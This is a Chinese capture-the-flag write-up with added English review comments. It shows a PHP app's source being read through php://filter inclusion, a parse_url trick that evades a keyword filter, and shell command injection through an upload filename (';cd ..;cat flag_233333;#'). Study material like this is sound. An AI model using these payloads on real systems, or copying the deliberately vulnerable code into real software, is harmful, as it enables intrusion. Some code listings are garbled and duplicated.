目录
信息收集
代码审计
parse_url解析漏洞 信息收集
进入即是登录页面，抓包一看应该是SQL注入，但是空格、%、|等等啥的都被WAF了，不太好注入，先信息收集一波。
花一分钟扫下目录，发现一个viminfo和register.php。Viminfo文件是Vim用来记录退出时的状态：
200 /index.php
200 /login.php
200 /register.php
200 /.viminfo
403 /.htaccess
vim updateadmin.php
vim info.php
vim login.php
发现一个info.php和updateadmin.php，访问的回显都是 you can not visit it directly。我们先注册账号。
注册admin时显示 Username has been registered!，查看URL似乎是文件包含，用伪协议读取下user源码看看：/user.php?pagephp://filter/convert.base64-encode/resourceuser
代码审计
?php
// user.php: page dispatcher. Chooses $page from the ?page= parameter and
// include()s "$page.php" at the bottom. Session handling and helpers come
// from function.php (which in turn loads config.php).
require_once(function.php);
// NOTE(review): the redirect for visitors without a session is not followed by
// exit/die, so execution continues into the include below even when unauthenticated.
if( !isset( $_SESSION[user] )){Header(Location: index.php);}
// Per-role page list (defined in config.php); only meaningful while the
// allow-list check further down is enabled.
if($_SESSION[isadmin] 1){$oper_you_can_do $OPERATE_admin;
}else{$oper_you_can_do $OPERATE;
}
//die($_SESSION[isadmin]);
// Admin: default page is "info"; otherwise $page is taken verbatim from the request.
if($_SESSION[isadmin] 1){if(!isset($_GET[page]) || $_GET[page] ){$page info;}else {$page $_GET[page];}
}
// Guest: default page is "guest"; an explicit request for "info" appears to be
// redirected back to ?page=guest. In this listing that redirect sits on the same
// line as a commented-out echo, so the exact original statement cannot be read here.
else{if(!isset($_GET[page])|| $_GET[page] ){$page guest;}else {$page $_GET[page];if($page info){
// echo(scriptalert(no premission to visit info, only admin can, you are guest)/script);Header(Location: user.php?pageguest);}}
}
// Keyword screen on the request's query string (filter_directory() in function.php).
filter_directory();
// NOTE(review): this allow-list check is commented out, so $page is not restricted
// to the entries of $OPERATE / $OPERATE_admin before it is included. Restoring it
// (and exiting after the redirects above) is the fix for the file inclusion this
// writeup relies on.
//if(!in_array($page,$oper_you_can_do)){
// $page info;
//}
// include of a request-controlled name; safe only once $page has been validated.
include $page.php;
? /user.php?pagephp://filter/convert.base64-encode/resourcefunction ?php
require_once(function.php);
if( !isset( $_SESSION[user] )){Header(Location: index.php);}
if($_SESSION[isadmin] 1){$oper_you_can_do $OPERATE_admin;
}else{$oper_you_can_do $OPERATE;
}
//die($_SESSION[isadmin]);
if($_SESSION[isadmin] 1){if(!isset($_GET[page]) || $_GET[page] ){$page info;}else {$page $_GET[page];}
}
else{if(!isset($_GET[page])|| $_GET[page] ){$page guest;}else {$page $_GET[page];if($page info){
// echo(scriptalert(no premission to visit info, only admin can, you are guest)/script?php
session_start();
require_once config.php;
// Aborts the current request: redirects to hacker.php and stops execution.
function Hacker()
{Header(Location: hacker.php);die();
}function filter_directory()
// Rejects the request when any key or value of the query string contains one of
// $keywords (stristr: case-insensitive substring match).
// NOTE(review): the query string is recovered with parse_url($_SERVER["REQUEST_URI"])
// rather than read from $_GET. If parse_url() cannot parse the URI or returns no
// 'query' component, $query stays empty and nothing is screened — this is the
// parse_url behaviour the writeup relies on. Screening $_GET directly (and rejecting
// unparsable URIs) closes that gap; an allow-list of pages is stronger than this
// keyword deny-list anyway.
// In this listing the foreach loop shares a line with a "// die();" comment; in the
// original it is presumably its own statement.
{$keywords [flag,manage,ffffllllaaaaggg];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
// Same screen as filter_directory() with "info" added to the blocked keywords.
// The user.php listing shown on this page calls only filter_directory().
{$keywords [flag,manage,ffffllllaaaaggg,info];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
// Screens a value before it is placed in SQL: every character must appear in
// $whitelist, the value must not match the $blacklist regex (case-insensitive),
// and the survivor is escaped with real_escape_string(). Non-strings yield an
// empty value. (Some characters of the original $whitelist literal were lost in
// this listing, so the exact allowed set cannot be read here.)
// NOTE(review): character/keyword deny-lists are brittle; the callers below
// should bind parameters with prepared statements instead of building SQL strings.
{global $mysqli;$blacklist information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password;$whitelist 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ(),_*-;for ($i 0; $i strlen($string); $i) {if (strpos($whitelist, $string[$i]) false) {Hacker();}}if (preg_match(/$blacklist/is, $string)) {Hacker();}if (is_string($string)) {return $mysqli-real_escape_string($string);} else {return ;}
}function sql_query($sql_query)
// Thin wrapper over $mysqli->query(); returns the driver result unchanged.
{global $mysqli;$res $mysqli-query($sql_query);return $res;
}function login($user, $pass)
// Looks up the user row by username and md5(password); on a hit stores the
// username and the isadmin column in the session.
// NOTE(review): `echo $sql` sends the full query, including the password hash,
// to the client. md5() is not a password hash — use password_hash()/
// password_verify() — and $user/$pass should be bound, not interpolated.
{$user Filter($user);$pass md5($pass);$sql select * from albert_users where username_which_you_do_not_know $user and password_which_you_do_not_know_too $pass;echo $sql;$res sql_query($sql);
// var_dump($res);
// die();if ($res-num_rows) {$data $res-fetch_array();$_SESSION[user] $data[username_which_you_do_not_know];$_SESSION[login] 1;$_SESSION[isadmin] $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
// Sets the isadmin column of $user to $level.
// NOTE(review): unlike login()/register(), neither argument passes through
// Filter(); both are interpolated straight into the UPDATE and the query is
// echoed. Use a prepared statement and drop the echo.
{$sql update albert_users set isadmin_which_you_do_not_know_too_too $level where username_which_you_do_not_know$user ;echo $sql;$res sql_query($sql);
// var_dump($res);
// die();
// die($res);if ($res 1) {return true;} else {return false;}return;
}function register($user, $pass)
// Inserts a new non-admin user (isadmin 0) with md5(password); returns insert_id.
// Same remarks as login(): bind parameters and use password_hash().
{global $mysqli;$user Filter($user);$pass md5($pass);$sql insert into albert_users(username_which_you_do_not_know,password_which_you_do_not_know_too,isadmin_which_you_do_not_know_too_too) VALUES ($user,$pass,0);$res sql_query($sql);return $mysqli-insert_id;
}function logout()
// Destroys the session and redirects to index.php (no exit after Header()).
{session_destroy();Header(Location: index.php);
}?/user.php?pagephp://filter/convert.base64-encode/resourceconfig ?php
require_once(function.php);
if( !isset( $_SESSION[user] )){Header(Location: index.php);}
if($_SESSION[isadmin] 1){$oper_you_can_do $OPERATE_admin;
}else{$oper_you_can_do $OPERATE;
}
//die($_SESSION[isadmin]);
if($_SESSION[isadmin] 1){if(!isset($_GET[page]) || $_GET[page] ){$page info;}else {$page $_GET[page];}
}
else{if(!isset($_GET[page])|| $_GET[page] ){$page guest;}else {$page $_GET[page];if($page info){
// echo(scriptalert(no premission to visit info, only admin can, you are guest)/script?php
session_start();
require_once config.php;
function Hacker()
{Header(Location: hacker.php);die();
}function filter_directory()
{$keywords [flag,manage,ffffllllaaaaggg];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords [flag,manage,ffffllllaaaaggg,info];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password;$whitelist 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ(),_*-;for ($i 0; $i strlen($string); $i) {if (strpos($whitelist, $string[$i]) false) {Hacker();}}if (preg_match(/$blacklist/is, $string)) {Hacker();}if (is_string($string)) {return $mysqli-real_escape_string($string);} else {return ;}
}function sql_query($sql_query)
{global $mysqli;$res $mysqli-query($sql_query);return $res;
}function login($user, $pass)
{$user Filter($user);$pass md5($pass);$sql select * from albert_users where username_which_you_do_not_know $user and password_which_you_do_not_know_too $pass;echo $sql;$res sql_query($sql);
// var_dump($res);
// die();if ($res-num_rows) {$data $res-fetch_array();$_SESSION[user] $data[username_which_you_do_not_know];$_SESSION[login] 1;$_SESSION[isadmin] $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql update albert_users set isadmin_which_you_do_not_know_too_too $level where username_which_you_do_not_know$user ;echo $sql;$res sql_query($sql);
// var_dump($res);
// die();
// die($res);if ($res 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user Filter($user);$pass md5($pass);$sql insert into albert_users(username_which_you_do_not_know,password_which_you_do_not_know_too,isadmin_which_you_do_not_know_too_too) VALUES ($user,$pass,0);$res sql_query($sql);return $mysqli-insert_id;
}function logout()
{session_destroy();Header(Location: index.php);
}?
?php
// config.php: error level, constants, per-role page lists and the DB connection.
// Only fatal errors, warnings and parse errors are reported; notices are silenced.
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, /var/www/html/);
// FLAG_SIG marks that config.php has been loaded; ffffllllaaaaggg.php and
// m4aaannngggeee.php test it to refuse direct access.
define(FLAG_SIG, 1);
// Pages each role may open. The check that uses these lists in user.php is
// commented out in the listing above.
$OPERATE array(userinfo,upload,search);
$OPERATE_admin array(userinfo,upload,search,manage);
// NOTE(review): database credentials are hard-coded in source and the
// application connects as root. Use a dedicated least-privilege DB account and
// load the secret from the environment or a file outside the web root.
$DBHOST localhost;
$DBUSER root;
$DBPASS Nu1LCTF2018!#qwe;
//$DBPASS ;
$DBNAME N1CTF;
$mysqli new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
// Connection failure prints the driver error to the client and stops.
if(mysqli_connect_errno()){echo no sql connection.mysqli_connect_error();$mysqlinull;die();
}
?$keywords [flag,manage,ffffllllaaaaggg]这三个页面可能有重要信息 parse_url解析漏洞 $keywords [flag,manage,ffffllllaaaaggg];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
这里看下处理的逻辑
?php
// Demo: parse_url() splits the URL into scheme/host/port/path/query
// (output shown below). Host is a CTF instance address taken from the writeup.
$ahttp://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?pageguest;
$uri parse_url($a);
print_r($uri);
//parse_str($uri[], $query);
? Array ( [scheme] http [host] 78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn [port] 81 [path] /user.php [query] pageguest ) ?php
// Demo: parse_str() on the 'query' component of the parsed URL yields the
// page => guest pair (output shown below). This is the same pair of calls
// filter_directory() uses, so whatever parse_url() fails to return here is
// invisible to that screen.
$ahttp://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?pageguest;
$uri parse_url($a);
//print_r($uri);
parse_str($uri[query],$query);
print_r($query);
//parse_str($uri[], $query);
? Array ( [page] guest ) 我们这里查到PHP版本是5.5.9 这里利用parse_url解析漏洞
///user.php?pagephp://filter/convert.base64-encode/resourceffffllllaaaaggg
?php
// ffffllllaaaaggg.php: refuses direct access. FLAG_SIG is defined only by
// config.php (loaded through function.php), so the branch below is taken when
// the page is reached via user.php's include rather than by a direct request.
if (FLAG_SIG ! 1){die(you can not visit it directly);
}else {echo you can find sth in m4aaannngggeee;
}
?
///user.php?pagephp://filter/convert.base64-encode/resourcem4aaannngggeee
?php
// m4aaannngggeee.php: same direct-access guard as ffffllllaaaaggg.php, then
// renders the upload form template.
if (FLAG_SIG ! 1){die(you can not visit it directly);
}
include templates/upload.html;
?
尝试上传文件，上传失败。发现/templates/upllloadddd.php，读upllloadddd的源码：
?php
// upllloadddd.php: stores the uploaded file under $path, echoes it back as a
// base64 data: image, and deletes it afterwards if the extension is not allowed.
$allowtype array(gif,png,jpg);
// $size is assigned but never checked in this script.
$size 10000000;
$path ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/;
// NOTE(review): the client-supplied file name is used unchanged as the on-disk
// path and, further down, inside a shell command. Apply basename(), validate the
// extension against $allowtype and reject names outside a safe character set
// BEFORE the move.
$filename $_FILES[file][name];
// The file is moved before the extension check at the bottom, so a disallowed
// type exists on disk until unlink() runs.
if(is_uploaded_file($_FILES[file][tmp_name])){if(!move_uploaded_file($_FILES[file][tmp_name],$path.$filename)){die(error:can not move);}
}else{die(error:not an upload fileï¼);
}
$newfile $path.$filename;
echo file upload successbr /;
// Echoed without htmlspecialchars().
echo $filename;
// NOTE(review): $filename is interpolated into a shell command without
// escapeshellarg(); this is the injection point the writeup ends on. Read the
// file in PHP instead (file_get_contents() + base64_encode()) so no shell is
// involved at all.
$picdata system(cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/.$filename. | base64 -w 0);
echo img srcdata:image/png;base64,.$picdata./img;
// Upload-error check runs only after the file has already been moved and echoed.
if($_FILES[file][error]0){unlink($newfile);die(Upload file error: );
}
// Extension = text after the last dot; checked only after the file was moved
// and already passed through the shell command above.
$ext array_pop(explode(.,$_FILES[file][name]));
if(!in_array($ext,$allowtype)){unlink($newfile);
}
? $picdata system(cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/.$filename. | base64 -w 0); 现在需要找到上传点莫非是之前的user.php?pageupdateadmin吗发现也没有上传处最后看wp发现上传点在/user.php?pagem4aaannngggeee看两者的页面貌似是继承来的 貌似不能加/ filename;cd ..;ls ;# ;cd ..;cat flag_233333;#